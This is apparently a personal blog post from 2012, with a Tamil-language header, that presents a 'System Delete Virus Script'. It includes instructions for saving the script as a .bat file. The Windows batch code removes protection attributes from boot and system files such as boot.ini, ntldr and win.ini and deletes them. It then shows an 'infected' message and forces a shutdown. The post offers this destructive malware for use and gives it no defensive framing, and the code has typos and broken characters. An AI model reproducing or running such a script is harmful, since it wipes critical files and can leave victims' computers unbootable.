INAYAULAGAM TO WELCOME

என்னுடைய பதிவை படிக்க வந்தமைக்கு நன்றி& WELCOME TO MY WEBSITE வாழ்க்கையில் திசை தெரியமால் போய் கொண்டு இருக்கும் ஏழை மாணவன் நான்

Thursday, 23 August 2012

System Delete Virus Script

System Delete Virus Script


Copy The Given Code And Paste It into Notepad { New Text Document } 
And save With  .bat File Extension For Example goto Save as Option From File tab >
Save As > Name It Delete System.bat or Anything you want but with .abt file extension

@echo off
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntdlr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
@echo off
Msg *YOU GOT INFECTED!
Shutdown –s –t 7 –c “A VIRUS IS TAKING OVER c:Drive

Popular post